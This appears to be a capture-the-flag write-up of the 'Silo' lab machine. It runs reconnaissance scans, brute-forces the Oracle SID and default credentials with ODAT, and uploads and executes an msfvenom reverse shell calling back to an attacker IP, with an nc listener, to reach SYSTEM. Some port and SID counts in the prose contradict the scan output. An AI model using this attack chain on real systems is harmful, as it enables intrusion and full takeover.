Silo

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.82

80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE

135/tcp   open  msrpc        Microsoft Windows RPC

139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)

49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC

49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)

49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/16%OT=80%CT=1%CU=35875%PV=Y%DS=2%DC=I%G=Y%TM=657
OS:E5D23%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S
OS:%TS=7)SEQ(SP=104%GCD=2%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=105%GCD=1
OS:%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M
OS:53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=200
OS:0%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time: 
|   date: 2023-12-17T02:29:46
|_  start_date: 2023-12-17T02:23:51
|_clock-skew: mean: -2s, deviation: 0s, median: -3s

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.82   

PORT      STATE         SERVICE
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
500/udp   open|filtered isakmp
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
20003/udp open|filtered commtact-https
40805/udp open|filtered unknown

We have fifteen open ports.

• Port 80: running Microsoft-IIS/8.5

• Ports 135, 49152, 49153, 49154, 49155,49158, 49161 & 49162: running Microsoft Windows RPC

• Ports 139 & 445: running Samba

• Ports 1521 & 4196: running Oracle TNS listener

• Ports 5985 & 47001: running Microsoft HTTP API httpd 2.0

Port 80 is running a Microsoft IIS server. A quick google search tells us that the OS is probably Windows Server 2012 R2. The gobuster scan didn’t really find anything useful for this web server.

┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.82  

+ Server: Microsoft-IIS/8.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FvdPFBj4.ashx: Retrieved x-aspnet-version header: 4.0.30319.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .

┌──(kali💀kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82/

/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]

Enumeration:

┌──(kali💀kali)-[~]
└─$ searchsploit Oracle TNS listener

Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Met | windows/remote/16342.rb
Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote De | multiple/dos/21782.txt
Oracle 8i - TNS Listener 'ARGUMENTS' Remote Buffer Overflow ( | windows/remote/16340.rb
Oracle 8i - TNS Listener Buffer Overflow                      | windows/remote/20980.c
Oracle 8i - TNS Listener Local Command Parameter Buffer Overf | linux/local/21362.c
Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasp | windows/remote/16341.rb
Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)           | windows/dos/8507.py

If you don’t have ODAT installed on kali, the installation instructions can be found:

GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking ToolGitHub

Oracle RCE & moreHackTricks

The first thing we need to enumerate is the Oracle System ID (SID) string. This is a string that is used to uniquely identify a particular database on a system. This can be done using the sidguesser module in ODAT.

┌──(kali💀kali)-[~]
└─$ sudo odat sidguesser -s 10.10.10.82 -p1521

[1] (10.10.10.82:1521): Searching valid SIDs                                                    
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                 ######################### | ETA:  00:00:03 
100% |#########################################################################| Time: 00:06:24 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#########################################################################| Time: 00:00:12 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...                 ##################        | ETA:  00:00:37 
100% |#########################################################################| Time: 00:05:46 
[+] SIDs found on the 10.10.10.82:1521 server: XE

This takes a while, but it does find 4 valid SID strings.

[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB,SA,SB

We discovered an SID called ‘XE’. Now let’s try finding valid credentials on this server:

┌──(kali💀kali)-[~]
└─$ sudo odat passwordguesser  -s 10.10.10.82 -p1521 -d XE

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521           
The login cis has already been tested at least once. What do you want to do:   | ETA:  00:19:52 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA:  00:22:51 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA:  00:21:55 
[!] Notice: 'dip' account is locked, so skipping this username for password    | ETA:  00:20:38 
[!] Notice: 'hr' account is locked, so skipping this username for password     | ETA:  00:16:36 
[!] Notice: 'mdsys' account is locked, so skipping this username for password  | ETA:  00:12:38 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for passwordTA:  00:09:48 
[!] Notice: 'outln' account is locked, so skipping this username for password  | ETA:  00:08:48 
[+] Valid credentials found: scott/tiger. Continue... ##########               | ETA:  00:04:50 
[!] Notice: 'xdb' account is locked, so skipping this username for password#   | ETA:  00:00:57 
100% |#########################################################################| Time: 00:24:01 
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger                                                                                     

Now we have valid credentials: user ‘scott’ and password ‘tiger’ for the server ID ‘XE’. We can use them to upload a reverse shell and execute it.

To do that first we need to prepare our EXE reverse shell using MSFvenom:

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell.exe

Now upload the reverse shell:

┌──(kali💀kali)-[~]
└─$ sudo odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp tonee.exe  /home/kali/Desktop/shell.exe

Start the NC listener on the port that we used with MSFvenom:

┌──(kali💀kali)-[~]
└─$ nc -nvlp 4444

Finally, execute the shell:

┌──(kali💀kali)-[~]
└─$ sudo odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp tonee.exe

Go back to your NC listener:

We are NT Authority\System.